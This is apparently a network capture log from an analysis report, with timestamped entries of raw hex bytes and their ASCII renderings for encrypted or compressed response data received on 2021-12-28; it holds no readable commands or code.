                                                                                                                                                        2021-12-28 02:24:06 UTC2432INData Raw: ed 6c 67 1a 13 f8 06 01 8c e8 c2 bf c1 dd 5b b3 10 79 e1 8c 67 d2 b7 1f 9d 0f 77 1f bf 25 f2 52 c8 25 01 54 fe b6 73 22 c1 30 79 33 3d 14 90 52 08 c7 e0 a0 84 af 64 4b 72 b3 ae 67 47 b0 6f 43 1a 5c 0d 18 9c 05 ac 5b f3 2f 9e 21 e2 19 40 5e 6e a4 69 ed 65 9b fe 72 96 bf 7b ba 04 9b c4 f4 45 58 23 1b 24 37 f1 bf e6 cf f1 96 69 0e e6 14 65 3c 55 7f c9 43 4d 62 98 81 ae bb 50 43 cf 05 0e 67 26 76 0c b9 5b b0 e3 2a 30 d3 62 20 23 06 5b 76 83 d0 e5 18 45 55 60 48 e6 72 35 9c 7e 1c a7 13 41 2a ea 66 c6 5b 75 f3 2c 54 7e 68 16 0f 64 fc 53 d7 15 b7 27 99 e2 79 71 4c 62 af 5c 2e 81 d9 aa 48 d1 1c a9 a9 02 3a 59 ec 57 fd e6 cf 86 ce 1c 6c d5 df 6f 88 64 8c 40 ca be b3 2d f6 17 fb df 3d 3d 3c 92 a6 3b e1 b5 04 29 71 86 1a 6c b6 e7 b6 bb 86 93 7d 59 53 de 1d 20 93 87
                                                                                                                                                        Data Ascii: lg[ygw%R%Ts"0y3=RdKrgGoC\[/!@^nier{EX#$7ie<UCMbPCg&v[*0b #[vEU`Hr5~A*f[u,T~hdS'yqLb\.H:YWlod@-==<;)ql}YS
                                                                                                                                                        2021-12-28 02:24:06 UTC2433INData Raw: 93 f3 eb 1b fa a8 0a 08 50 9e 4e 18 54 b2 52 4f 8a bf 08 a0 b8 86 7f 7d 4e 69 25 ab 4a 65 2c f3 7a 98 03 bd 9d 00 f7 7f 58 8f 8f 7c 1d 22 53 b3 0c b3 62 90 26 53 83 0f b8 79 f7 06 bb 4e 84 3b 9b bd 42 5d 48 11 75 a1 79 3d 72 4a 2b fa 41 c9 a8 0b c7 41 9f 06 d1 40 b9 67 b1 b4 0d 71 60 a8 0e 22 1f fa 9c 88 88 26 0b f4 8a bb 10 06 a6 f0 42 01 a6 fe 26 b2 63 9d 04 92 52 4b 96 b6 e8 b8 05 47 f2 ad 7b 76 3b dd 87 0c f2 db 07 bd cb 28 34 f8 90 dc 1c 92 48 01 4b 12 d5 13 2d eb 23 58 55 a5 15 ba 2e 5f 68 8d ad ce ae ae a6 e8 df 22 39 1d 5a 4a c7 a2 c0 69 be 75 a8 50 0b be b1 98 7a a6 d2 5b cb 56 85 a3 04 3c 8e fd ba 1a 7c e8 2a 19 b6 14 db b0 cb e4 5d 1b 9d 68 93 a7 a2 38 5e 84 49 06 64 08 91 03 90 cc e4 27 d7 a1 55 1d 5a 3e ec c6 98 c0 8a a1 e5 22 3f d2 88 76 85
                                                                                                                                                        Data Ascii: PNTRO}Ni%Je,zX|"Sb&SyN;B]Huy=rJ+AA@gq`"&B&cRKG{v;(4HK-#XU._h"9ZJiuPz[V<|*]h8^Id'UZ>"?v
                                                                                                                                                        2021-12-28 02:24:06 UTC2435INData Raw: 3b a1 e6 be 59 3e 3b b8 6f 26 35 cb 10 f4 ed 92 63 9a 37 56 37 52 df 3d 5b ee 56 84 7f f3 50 25 52 e7 28 b4 0a b1 56 f7 c6 29 21 71 c4 47 0f 40 51 8f 3b be 04 9c a0 7f 4b 57 f2 52 a6 2b e5 1c a8 68 4a bb 05 41 f5 31 ac 8b 19 3e 65 c6 1e 80 42 12 73 57 87 97 70 19 af 74 2f 3d ce a1 2b 2a 9d a1 02 1a 82 f7 3f ce c0 1a e7 a7 6b 4c ef f7 c9 7e e4 26 7a 79 dc 09 16 03 82 5a 2a 49 5c 6a 56 0c e6 17 86 be c9 52 30 5e e3 a7 43 8f 5e d2 1f 53 5e 16 1e c3 8d e3 7a 5d 33 d5 fc 5d 1c 38 7d 84 37 14 98 f9 71 c7 d6 4a 21 9d e5 a1 1f 8b 2b 39 ce cc a7 33 72 61 c6 7d e4 a3 ae 82 f0 8d 8d 31 6b 8a fb fa 8a 2a 7a 6c 22 35 8c b0 f3 1c 9b ad 44 cc 14 35 c9 88 ff 53 4c c0 53 c7 57 38 f9 c6 60 79 80 9f 9c 3f 1a 05 8b f6 34 dc 03 c7 78 70 77 18 74 b6 fb 96 f5 5d c0 de a0 7a 0d
                                                                                                                                                        Data Ascii: ;Y>;o&5c7V7R=[VP%R(V)!qG@Q;KWR+hJA1>eBsWpt/=+*?kL~&zyZ*I\jVR0^C^S^z]3]8}7qJ!+93ra}1k*zl"5D5SLSW8`y?4xpwt]z
                                                                                                                                                        2021-12-28 02:24:06 UTC2439INData Raw: e5 2a 20 02 12 6d ca fc db a0 84 fc c1 9c e1 21 9b fb 3c aa cd 25 89 21 8c 61 40 2c 30 aa 78 21 3b 3a 95 ab 10 9e f4 7e 91 90 9d 0b 32 57 e3 f7 2c 13 1b 46 a1 31 7d f2 24 c2 e0 71 c6 70 22 10 a2 87 37 6f c7 f0 ee 08 b6 79 78 b5 22 1c ec 09 7b 48 b3 5a 34 e5 ca 37 cb f8 84 48 6e fb d5 d1 35 1d 0d 6d 99 de 47 61 95 d4 9f 8c b4 49 23 85 26 d7 12 e3 3f 86 0e ff fb 52 f7 3d 03 9d 02 a6 a8 77 e8 5f d2 2e 01 45 d6 67 08 ed 50 03 e3 85 36 87 d7 0b cf fa 40 7a 5f c3 06 b2 15 30 c4 aa 60 cf 48 2c ac f8 94 9d bb c9 f8 15 71 f4 0e 67 21 7f f4 dd f7 5c f3 9e 88 b5 86 f6 67 2e 91 18 f5 d4 07 c8 e0 05 f5 2c 55 9e 0f 1d 78 4e 14 95 7d 83 2f f5 6c b6 90 d0 99 8a 96 65 a0 39 8d cd ed dd 55 20 fa 6f 24 d3 48 5b 5a 44 cf 6c dd 95 37 3e bf 35 77 18 20 6a 13 6a e0 95 f1 a6 21
                                                                                                                                                        Data Ascii: * m!<%!a@,0x!;:~2W,F1}$qp"7oyx"{HZ47Hn5mGaI#&?R=w_.EgP6@z_0`H,qg!\g.,UxN}/le9U o$H[ZDl7>5w jj!
                                                                                                                                                        2021-12-28 02:24:06 UTC2443INData Raw: 49 6e 0e 67 4d 58 dd 3a b1 c3 45 28 3d 9b b8 20 4e fa 38 8e e9 e6 db a7 05 34 1d b8 d7 e8 85 c6 7d 8e d9 48 3b 38 70 98 1c 21 8a cc 35 97 71 3f 0a 49 c1 b1 ab 80 7a dd af 51 b0 c3 3e ae f4 49 ed 08 bd 5d f4 74 f6 af 84 58 53 a9 48 c8 de 1b 5d 91 d8 6b ec b4 00 0f b4 a9 29 30 f8 e0 05 14 df 15 c7 ad ad 7a be 23 09 c3 59 e0 f0 29 9a b2 8d c2 28 c8 59 eb 49 48 29 f8 0a 5d e9 90 be 91 4a 37 c4 19 da 82 18 d4 aa 7e be 11 1e 6f 98 b3 0b f6 4f 23 0c 7a d4 9b 78 10 18 af 8a de 59 e9 49 ed 08 93 0d 08 e5 9a c3 f6 60 49 a2 4e a3 62 d3 84 b9 77 64 3a 6f d1 29 cb 2a a3 d2 06 c9 e3 45 14 80 3a c9 61 12 ae f3 12 97 72 d4 03 3a bb d6 0d 8d 6e 45 ca ff ca fd 41 cd b0 33 7e 86 94 21 2d 05 d8 4d 82 56 f6 c0 c5 2e 07 01 93 47 95 f8 bb a5 77 0b 4d d6 12 9b 27 80 bd 37 49 76
                                                                                                                                                        Data Ascii: IngMX:E(= N84}H;8p!5q?IzQ>I]tXSH]k)0z#Y)(YIH)]J7~oO#zxYI`INbwd:o)*E:ar:nEA3~!-MV.GwM'7Iv
                                                                                                                                                        2021-12-28 02:24:06 UTC2447INData Raw: 5b 37 96 13 56 81 54 53 46 af 98 fd 44 e6 83 0c 0b c2 92 31 2e 28 eb 4b 82 0c 89 ef 89 33 cb 9e 84 e9 bf aa 02 d4 57 dc cd 52 fa 6c 7d ea 05 3d 3f 70 ab 4d 6d 2e f0 78 b5 58 d2 9f ca a5 9f e1 6a 23 87 49 77 f8 59 b8 ad 0f a3 af ff 76 76 de e2 c5 7d 36 46 19 c8 af ea 44 ac 6f b4 ad 79 18 c4 82 ce 20 21 b3 52 1b eb 2a 55 82 af 19 0d 75 fa 8c f1 b3 42 bd 55 4f e2 4c 24 16 f4 7f 49 68 8b 37 1a 7e c4 77 60 80 a9 8f 4f b4 22 11 83 1d f4 94 79 60 05 b6 6d 68 da 2b fe 2a 69 72 82 e4 eb a6 91 fd 62 47 4a 7b 68 cb e7 02 6d 11 24 86 99 b2 c2 00 85 d6 ab 26 cf bb 55 83 c8 ef c7 44 6c 65 39 68 aa 66 24 4e af 0c a6 e7 25 f4 37 0f 01 55 db b2 7c c4 e0 e7 55 9c 5a 9e 98 5e 63 97 6d 24 09 ec 6d d0 0b 92 31 48 2f 83 f9 8f d4 b6 f7 c0 0c 1c f8 ff 92 2c b1 13 d9 f5 14 d0 b1
                                                                                                                                                        Data Ascii: [7VTSFD1.(K3WRl}=?pMm.xXj#IwYvv}6FDoy !R*UuBUOL$Ih7~w`O"y`mh+*irbGJ{hm$&UDle9hf$N%7U|UZ^cm$m1H/,
                                                                                                                                                        2021-12-28 02:24:06 UTC2451INData Raw: 1b f2 81 1d c1 d4 ef d1 05 35 87 42 c2 70 c2 47 9b 47 1e 3c 24 d4 a1 9b 5c 84 77 14 b2 3f 9c 49 f3 7e f1 f8 f0 bd 28 47 6b 4d d3 a5 5f f0 56 4c 89 21 84 7d 26 86 1e 27 cf ab 4c f4 64 1c 7a b6 b8 66 67 86 b6 8d 75 0a 98 b3 55 47 39 28 a4 97 23 fc a0 c6 92 16 fb 16 02 2e 8c 65 62 9a a5 16 92 ec 83 9b 41 e0 b6 4f 14 c8 39 02 c4 f5 b7 88 93 3a 34 fb b9 8f f3 00 e6 36 c5 0c 8b a8 03 e4 d6 f1 6b 09 47 42 8a e8 4a c1 46 d5 ed 82 7c fc e3 8f de 47 e4 d9 58 0c 96 ae b5 48 2a 78 c5 a2 fb f2 89 e5 13 cb 79 de 9c 05 0f ac 3d f9 2b 9c a6 a3 6a 9d 0d 36 18 93 77 dc 23 68 78 0a 0b cd a6 72 f1 20 13 2c 70 ff 81 39 06 45 df 7f f1 c4 65 a1 39 31 fd 33 0d a9 96 ff b3 47 7c 07 50 43 7f fa 02 e9 77 ac e2 e1 90 1e 9b 0d ee 9f c3 c9 eb 7d 91 d6 75 73 e0 20 2b b6 b8 d4 8c 10 e1
                                                                                                                                                        Data Ascii: 5BpGG<$\w?I~(GkM_VL!}&'LdzfguUG9(#.ebAO9:46kGBJF|GXH*xy=+j6w#hxr ,p9Ee913G|PCw}us +
                                                                                                                                                        2021-12-28 02:24:06 UTC2455INData Raw: 18 8d 70 82 be 87 69 91 a7 f8 d8 a9 99 91 be 10 f2 59 b2 fe e9 af 09 f5 b8 af 99 72 06 73 97 89 e7 e0 09 55 e9 1e 1a 3f a1 77 30 45 d3 c7 b8 5a f5 9c 67 95 49 25 97 ab 6d b2 32 31 87 fd c3 9e 05 ae 76 24 7c 7d b7 b6 7b 58 1b 3a fc da 65 5e b3 29 ec 7b b2 3d 4b 0e 23 6b 46 77 45 f6 0a db 1b fe 9e fb c1 ed 69 a7 db e9 6b 7d 12 ab 31 7c 7d f3 ce a5 76 6d 2f 81 5a bb d2 69 c9 aa f9 75 b0 7c d4 6a 77 51 bc 28 87 be 2e 89 4f 37 50 84 20 66 ce 28 e1 ad 00 74 52 57 bc 2d 9e 15 87 9d 3e 30 fd af c3 12 63 3b ac 64 23 93 6c b2 f2 30 98 46 7e 19 d6 a6 a3 04 08 04 6a b5 13 72 0b 4c 36 71 e6 0f d4 df b6 22 4f c2 38 02 2c 75 18 e0 10 e0 af a9 4a f7 5a 90 ee 31 25 91 fe 7c cf 08 03 e0 18 de 73 b4 e8 5a fd 60 6d 0f 0c e8 77 58 69 7a eb f5 95 83 8b 0c 76 56 89 bc a8 68 53
                                                                                                                                                        Data Ascii: piYrsU?w0EZgI%m21v$|}{X:e^){=K#kFwEik}1|}vm/Ziu|jwQ(.O7P f(tRW->0c;d#l0F~jrL6q"O8,uJZ1%|sZ`mwXizvVhS
                                                                                                                                                        2021-12-28 02:24:06 UTC2459INData Raw: 45 8b be 26 08 9b c7 e9 0d f1 a7 ea a8 71 1a b6 7f ad aa 97 95 73 0b 49 c6 c3 d5 53 ba 3f db 8d 18 4b 21 45 30 7e 9e 2c 3a 14 2c 5f 68 04 03 4a d0 91 8a f3 10 84 90 7c a4 a9 75 e2 af 73 01 b8 b9 ac 52 ab a8 3d 79 63 90 d1 1a 86 97 0c 31 ae f1 c1 98 cf 9d a2 aa 7c 58 da fc 50 73 0a d0 1b 4a 1b e3 a5 e9 1d 08 f6 79 66 04 a3 65 1d ba e5 c8 de 03 96 1c 79 d1 c9 67 74 be 51 61 67 25 56 52 f1 3e f3 a4 06 07 9a a4 7b 1b f7 d3 9f f1 62 64 f4 35 5f 1d 5f 70 4f 73 33 1b a5 0a ec d0 8d 18 53 3e d6 ad cd e5 1a 9c 35 74 0b eb de e5 46 76 2f 92 59 d1 2d c0 a5 be ee 3f f3 e0 98 ef ff a0 30 94 8d 96 bd c9 1f 7c c3 41 39 ae 0b 1a 1b 41 96 f1 2e 58 69 bd e9 76 fd f3 66 85 a9 cc 77 20 1d 42 dd 77 40 a7 5c 6a 65 2d 43 88 c4 27 ef 48 b5 34 fc 52 64 33 72 7a 17 45 18 58 5f 30
                                                                                                                                                        Data Ascii: E&qsIS?K!E0~,:,_hJ|usR=yc1|XPsJyfeygtQag%VR>{bd5__pOs3S>5tFv/Y-?0|A9A.Xivfw Bw@\je-C'H4Rd3rzEX_0
                                                                                                                                                        2021-12-28 02:24:06 UTC2463INData Raw: 13 f1 db 4a 3d 06 e0 eb b2 e8 9c b8 70 f2 2c 0c d8 02 57 9c ad 82 6c 99 19 2d a0 47 2b 1b b8 6d 1b d5 24 a1 a4 b9 98 7a 9f c3 0d b9 15 4c 68 62 0b f7 08 c8 15 1a e5 39 d4 22 73 60 0f 7d 2d 97 83 d9 ca c8 64 7b d0 08 33 3c 31 77 27 54 22 4d 71 f5 42 2b 2f e3 f5 3b 0b 34 52 d0 af dc 3a 2e cb 09 29 f8 1c 97 60 02 c8 13 b0 91 00 63 2c b2 e4 4c 38 2c 99 f6 ef 4d fb 8a 55 a2 69 4e 6b 65 56 df e3 21 cf 87 6e 51 14 eb d1 2d 5d 67 d4 20 b4 d8 62 17 da 3d c1 31 ad dd 7d 61 ff a6 cb 68 16 ea 5a f7 c1 63 dc b1 5d 7a 98 46 0f 9c 7b 75 0a 48 90 36 22 46 f3 01 e8 09 8e c1 76 a7 d0 35 4c 27 0b 10 21 f1 4d f4 37 dd 9a 91 b3 8c f3 8d 55 2b e5 7a 6b 9b 18 fb 32 7c 8f c2 cc ad 3f 3b 42 32 8b eb 95 33 d9 69 ac 6d e7 94 c6 fd 89 03 bb 76 f6 0f 48 e8 78 46 b2 20 f7 67 f9 b7 e1
                                                                                                                                                        Data Ascii: J=p,Wl-G+m$zLhb9"s`}-d{3<1w'T"MqB+/;4R:.)`c,L8,MUiNkeV!nQ-]g b=1}ahZc]zF{uH6"Fv5L'!M7U+zk2|?;B23imvHxF g
                                                                                                                                                        2021-12-28 02:24:06 UTC2467INData Raw: 9b 0d dd c2 15 bf 79 94 4e d2 03 12 f5 07 eb c8 b4 77 11 8f 0d 4e c4 0e 24 db 0c 67 9f 80 95 8f 47 d1 02 97 35 f8 c6 4b 2f 32 dd 99 63 3c b0 77 8c 5f 7b 19 45 5e fa 65 f3 3e 2c a2 0b d9 f5 e5 71 2c 74 a7 3b d5 0f df cf af 00 e3 2a 6c d6 0d fb 70 12 99 54 c3 1e 3e b1 d5 1b dc f2 9b f6 7a 1b 91 f5 0d 8c c8 37 5d 9b a9 49 dd 34 c3 96 ec bb 35 ec bf 0b 77 0b 47 8b f6 c6 27 06 70 e3 38 ed bd a3 be 34 65 06 1f 14 df d7 e4 50 4b fe 47 a1 65 af 9f a6 b8 c2 22 47 2b e4 94 f7 6f 95 c6 a8 00 a3 d7 b9 aa c9 27 60 4e 87 41 ca 59 c7 f8 57 ee 24 0c 82 66 df 29 4b 2c d8 e1 30 e1 e7 41 d0 c5 18 42 4c cf 3c e0 f1 f2 4e 0a f0 60 f9 2e b0 93 ce d5 2a d9 be ab 0f 15 85 1a f8 9e 64 47 ce 99 6f 2c 71 69 11 ae bb a8 ef c8 dd db 8f 0e eb fa cd 06 3b ec aa d2 b5 78 37 cb d3 6f 66
                                                                                                                                                        Data Ascii: yNwN$gG5K/2c<w_{E^e>,q,t;*lpT>z7]I45wG'p84ePKGe"G+o'`NAYW$f)K,0ABL<N`.*dGo,qi;x7of
                                                                                                                                                        2021-12-28 02:24:06 UTC2471INData Raw: 43 bf 87 ab 05 77 dd 61 2e 41 67 c7 3e 0d 2b 87 d6 4d f5 84 09 f1 43 c7 8a cb 67 3a b1 a3 2d 60 f4 c2 05 31 89 bb af d3 02 60 a2 a6 ae 2b 4e 18 00 23 e6 e8 b8 09 7a fa 35 f0 83 8d 9d 1e 19 b6 7b 8f 89 67 80 e5 b6 57 35 61 af 57 f2 f9 11 a3 7b 67 31 bd e7 ba 4c b9 47 f2 52 d7 3a d8 8b 5f 20 b8 c4 c1 d4 03 36 48 d5 e0 61 71 2d e9 52 b7 27 36 ec a1 3b b6 30 2a d0 de 39 df 73 09 6c d6 0c 10 f2 5c 84 dc dd 4f 83 9f d7 01 44 89 d7 84 40 a7 44 9c 3b cc 6c a7 f7 0b b7 37 e7 15 ef a7 92 2e 0b 85 c1 7a 0b d9 ca bf 31 48 6b 33 73 0f 53 be f1 01 79 b2 00 a3 3f f1 b5 e4 97 a7 ea a9 60 9c e1 6e 9f 96 8d 23 43 bd 03 68 d4 99 6e 8b 7f a5 30 fb 13 80 57 bf 3d 12 25 be 9d df 1e c8 4e 00 78 44 d2 91 ce b4 ae c5 a6 d4 b3 7f 9a 7a f0 0b c0 b0 ed 19 7f 5a dc 09 d8 70 7b 4d 13
                                                                                                                                                        Data Ascii: Cwa.Ag>+MCg:-`1`+N#z5{gW5aW{g1LGR:_ 6Haq-R'6;0*9sl\OD@D;l7.z1Hk3sSy?`n#Chn0W=%NxDzZp{M
                                                                                                                                                        2021-12-28 02:24:06 UTC2476INData Raw: 2f 77 89 03 63 2e bf d2 54 3b 50 9d 19 96 b6 8b b9 30 45 8f 4f f1 a6 45 f3 1a bf 5f a6 61 79 9a 21 e8 a7 8e a5 cb ef 95 b5 54 9b 83 30 02 57 a3 52 f9 d8 9b ce 59 d8 e5 3d b8 89 ca 69 a7 7e d5 24 b2 b8 1c 91 fd fa 4d 8a 5f 6c 4b e6 2b c5 f9 2b bb 59 f3 dd a2 0d ed 03 f4 a5 89 a0 e6 16 66 6c fa dc 83 b4 82 a1 9f a3 a1 0d b7 5f e0 12 53 9d fc 87 a0 40 04 f0 17 a0 48 64 27 b6 53 e1 8a 5e e7 d7 29 2e 0a fa db ea 17 56 e7 11 ca ce be 1f f5 02 5c 28 6f 4c 3b fc 6b e1 f2 53 bf 28 13 e1 ea 55 a9 07 52 e7 33 b7 ef 1c 4e bf 8d d3 09 bb ed 3f 5e 80 f3 6a 50 4a 0b 7e 89 93 4d 2e 92 64 c3 8d 3c 8a 7d 76 6a 1c 2d 9a 2d db 08 98 9f c3 57 02 f3 a6 57 ab fa 4a 08 c6 cc 4c 2b 00 07 f4 bc a1 12 25 de 15 16 cd 43 aa bc 7e 1a 7e d2 a0 4f 9e f4 9a ed 78 34 fe 24 d5 fd 13 93 2f
                                                                                                                                                        Data Ascii: /wc.T;P0EOE_ay!T0WRY=i~$M_lK++Yfl_S@Hd'S^).V\(oL;kS(UR3N?^jPJ~M.d<}vj--WWJL+%C~~Ox4$/
                                                                                                                                                        2021-12-28 02:24:06 UTC2479INData Raw: 8a 7f 02 8e 2f ef a5 b5 9f c2 c7 61 df 61 fe e5 4e 2c 6f af a6 ba a4 6e 3b cf fe 6d b8 62 54 34 dd b3 da ae 02 55 83 47 08 4d 7c 86 29 9d ff f0 68 bb e7 8b 39 6a ab aa b4 9d 81 01 18 bc ff 35 13 19 88 41 bd 11 02 37 d0 b1 72 14 ac 92 48 c2 82 f5 53 d7 9d 83 d0 bf ab 45 12 d7 24 ee ef ee bf 6f 79 f6 07 a0 67 70 e3 2f eb a4 f3 10 8b 20 94 64 b3 6e fb 8c a3 8d c7 49 30 df 05 b4 09 65 7e 4b 1a 66 74 f5 d7 b8 1f 6e f8 d1 fd 53 70 7e 46 8e a2 f0 b4 e8 53 14 11 e6 5e 2f f5 95 9e 2a 3c ba f8 3d d4 06 12 64 e4 f1 a3 03 28 e7 9c 5e 3d 69 5b 3a c6 b5 88 15 43 cb b7 bd 4d 0f 67 b6 83 35 49 4f 78 d9 1a 20 fe fe c6 e9 e0 ce f1 f5 9b 8d ad 7a 4b 07 89 85 20 83 c5 49 ab c9 7d 90 72 e9 5e f0 75 6d bb 7c 4f 58 b0 49 16 de 5a a1 e1 59 8a f8 a0 28 61 20 b3 29 d4 60 39 93 dd
                                                                                                                                                        Data Ascii: /aaN,on;mbT4UGM|)h9j5A7rHSE$oygp/ dnI0e~KftnSp~FS^/*<=d(^=i[:CMg5IOx zK I}r^um|OXIZY(a )`9
                                                                                                                                                        2021-12-28 02:24:06 UTC2483INData Raw: 4a 92 10 56 c0 5a a2 dd 55 10 5b d7 d9 e3 22 9a f7 7b 70 5c 77 ff c7 ff 19 53 ed 27 32 81 f1 50 db 46 dc 4e cc e2 44 d5 d9 d0 6c 8d ec 5d 3d b8 0f e4 4d af 84 12 b1 43 b4 17 5c 4c 3e a5 58 f8 99 71 7c 25 e4 23 31 c6 e4 55 2c 91 ba 08 43 75 1f d1 24 4f 0b db 1e 99 9c bf 03 2e 4e e7 33 48 fa 4e 78 be ea 11 13 b1 19 21 b1 20 02 7a da 6c df c4 99 84 d0 f3 9a bd 08 ce 6e 25 aa 9d a9 3f db bd 7c 18 0f ff 1c a5 e8 2f 8d 74 db f4 38 c2 c3 2f 7a 27 d7 27 a4 91 bb 24 d1 a0 77 6a 1c 4f 32 df de a5 94 d0 86 30 c7 0e 88 6f 9a e2 66 0a 73 8b 7f 5d 4f 71 34 f4 6a f2 3f ff 19 6f 2a 93 55 13 ba 00 7f 57 39 6e 28 6d 29 44 c7 96 7d 94 2c dd 09 c9 02 00 11 a5 f3 cf e0 b6 03 e4 e4 f3 3f 3a 25 76 b6 a4 7c 73 08 bf e2 09 bb 9b d7 f3 50 52 48 61 58 d1 c9 e4 6b f7 a4 ff 71 f3 28
                                                                                                                                                        Data Ascii: JVZU["{p\wS'2PFNDl]=MC\L>Xq|%#1U,Cu$O.N3HNx! zln%?|/t8/z''$wjO20ofs]Oq4j?o*UW9n(m)D},?:%v|sPRHaXkq(
                                                                                                                                                        2021-12-28 02:24:06 UTC2487INData Raw: b3 8b 42 14 57 fd 10 17 9e aa e5 3b 90 3c 60 17 72 dc 02 e6 2d 74 20 24 f4 07 45 92 04 c9 6d ec 06 01 d0 28 30 c7 27 37 4f 5a 4d 04 d5 6d ef cc d7 82 e5 f7 d2 33 83 b1 6e cf a3 9b 64 e3 a2 84 9b 44 24 c4 91 f8 ac 3e 65 dc 44 2a 6c eb a3 f8 b8 d0 3a 6e 20 f7 0c ea c2 c7 53 53 77 9f 44 b9 55 7a a6 66 27 d0 67 08 eb f9 4b 8f 28 e3 ab a9 dd c4 b0 09 e6 5b 96 09 91 50 bb 3d f4 74 b1 87 31 e5 26 ea 7e 07 76 39 88 90 85 2d df 0e 34 70 22 60 96 2c 5e e5 2d 50 3c 2c e0 00 31 d2 9f a1 44 5b 44 12 27 23 ed 03 30 c0 ad 82 3c a3 bf 12 41 24 74 03 83 ed da ec a1 ad bd 9b 62 4f e3 af 55 12 f2 47 68 d9 ef af 5a 9b 8e 5e 55 b1 f0 8d 4d f9 bd 9b 62 76 73 6b c7 7e 2c a0 ab 45 b1 b9 60 cd 7c f7 b0 24 17 60 76 4a 6b 8c 36 33 c7 6f 5b 93 df 68 c5 7f d8 ca 36 82 0f 22 8f 15 7d
                                                                                                                                                        Data Ascii: BW;<`r-t $Em(0'7OZMm3ndD$>eD*l:n SSwDUzf'gK([P=t1&~v9-4p"`,^-P<,1D[D'#0<A$tbOUGhZ^UMbvsk~,E`|$`vJk63o[h6"}
                                                                                                                                                        2021-12-28 02:24:06 UTC2491INData Raw: 40 7d bd 53 9f 79 e9 5c ae bb 69 9e 97 50 4f 7c b3 2a 0b c8 31 6b 60 95 3a f9 67 e7 50 9a 94 0b 4b 16 98 28 fe ae 07 b7 68 55 26 04 be 79 01 93 19 b4 3e 3f 10 73 0a f9 09 11 c0 67 c9 bd 44 91 e6 e8 10 68 42 a4 c5 60 0d 83 e4 a9 eb dd 72 b0 c8 f3 1d 37 fa 50 3e 56 b7 47 4e ea 83 57 1e 53 ec 89 30 48 ac d3 bf d2 b2 d5 72 23 52 37 78 eb 0e 51 d1 36 89 31 de 81 6e ea c8 c8 05 b1 f9 7c 85 e2 d1 3f da de 1f f3 bf 4a 47 4d 41 06 76 70 d4 b3 22 8e d3 2a 96 51 57 26 e0 d2 c0 4c 07 2e 72 6c c6 2b db 69 2d 7b b9 f9 24 3c 1c ab 51 03 de 68 d5 5c ed 96 3c 20 80 2d f9 b0 a6 76 67 2e 2f a8 3e 30 4a aa ef d0 e8 ac 32 e2 82 cd 7a c6 c0 3b 42 47 fe 0f a0 7c 11 8c 6e c1 df 69 31 37 8d ba be ca 1e 88 1c 68 d9 18 5e 40 67 a4 5d 27 dd 01 9e dd 49 b9 d4 0e ca a8 47 de 95 88 1b
                                                                                                                                                        Data Ascii: @}Sy\iPO|*1k`:gPK(hU&y>?sgDhB`r7P>VGNWS0Hr#R7xQ61n|?JGMAvp"*QW&L.rl+i-{$<Qh\< -vg./>0J2z;BG|ni17h^@g]'IG
                                                                                                                                                        2021-12-28 02:24:06 UTC2495INData Raw: e1 c3 02 35 fa f2 97 f8 37 04 f6 00 30 e5 2f 3c 49 8d 2b e6 2a a8 1e 9f 01 56 7f f9 d6 b7 fe 25 ea 7b d7 9b 9e 12 f7 8e 20 f7 a9 f6 c6 d4 cd 8b 8b 63 12 68 43 b1 ab c9 19 47 09 81 84 2c c3 00 3f 88 74 ec 1c 77 69 3e c3 ae 0e 92 22 a1 84 9c 04 94 b7 86 04 b9 ad 8f cb 49 84 9b 7d 14 0c a8 7b af 69 4a 29 26 4f f0 cd 0c 97 da d2 9d a9 b1 ae e1 ed 40 60 02 0d be 56 75 0c 53 f1 7a 72 e1 8f a6 78 75 2b 37 cf 11 6e 64 e2 fa 6d 05 b0 6e e8 66 bb 3d 36 a9 01 df b3 f8 22 30 e4 2a 7b 58 85 d3 c9 7c 8f 53 58 7b dc 82 b4 3e 35 05 ea 85 46 c9 30 18 5c b4 7d d9 d5 2c a0 94 de 6e b1 0a aa c2 3d c8 a5 cb 23 bb fe 8f c2 b7 f3 02 78 46 17 8b 5b 7a df f4 f2 25 71 a0 64 ff a4 ae 40 52 c7 e9 eb e5 89 e8 b6 bc eb ac 9d d2 af 8c 09 91 15 f1 65 b5 2a 0d 0f 9e a6 86 fa 1c 8c 07 dc
                                                                                                                                                        Data Ascii: 570/<I+*V%{ chCG,?twi>"I}{iJ)&O@`VuSzrxu+7ndmnf=6"0*{X|SX{>5F0\},n=#xF[z%qd@Re*
                                                                                                                                                        2021-12-28 02:24:06 UTC2499INData Raw: d2 fc a8 d9 02 a3 61 1d b5 d9 b5 d0 49 87 be 9e 7b 21 c4 88 a6 2a 83 56 8a 0b 01 ad 21 6e a2 81 a3 fc d2 c8 49 10 de c1 bf 6f 54 eb 0b 67 64 61 d4 bc 6c 77 3f 6d 31 38 19 63 d0 89 cb 4d 09 d3 a7 b4 14 28 d7 1d 9b 1a 59 58 9f 4e 2b f6 07 8e 2b 83 c4 a7 78 19 49 aa f5 9f 0f 9b e4 8a 4b 91 10 a1 37 9c 30 45 05 4c fd 07 31 dd 2b 0b 3b 11 93 e0 cd 36 eb ee 02 85 c2 e4 e9 59 d1 26 b3 20 a8 25 cf e1 89 3e 22 ae ff a0 a8 c8 c9 04 35 86 85 72 f7 80 f8 43 bf 79 1f f3 8d 7d a9 b0 e2 51 02 94 f5 e8 3b bb c0 c1 77 66 66 57 cc d9 40 b2 05 69 81 ba 63 c7 94 b7 c8 e2 5f da 88 a1 1b 45 a2 31 7a 1e 18 c2 cb 03 35 70 c0 b8 5f 5c 2f ce 8a 21 e7 1d 30 f1 09 f2 68 7c 89 dd cf e7 59 a8 c2 9c c4 f5 c9 79 b8 11 c1 f6 5c 41 72 ef 8d f6 69 7e be 20 ac 52 d2 17 4e 56 bf 69 94 c8 dd
                                                                                                                                                        Data Ascii: aI{!*V!nIoTgdalw?m18cM(YXN++xIK70EL1+;6Y& %>"5rCy}Q;wffW@ic_E1z5p_\/!0h|Yy\Ari~ RNVi
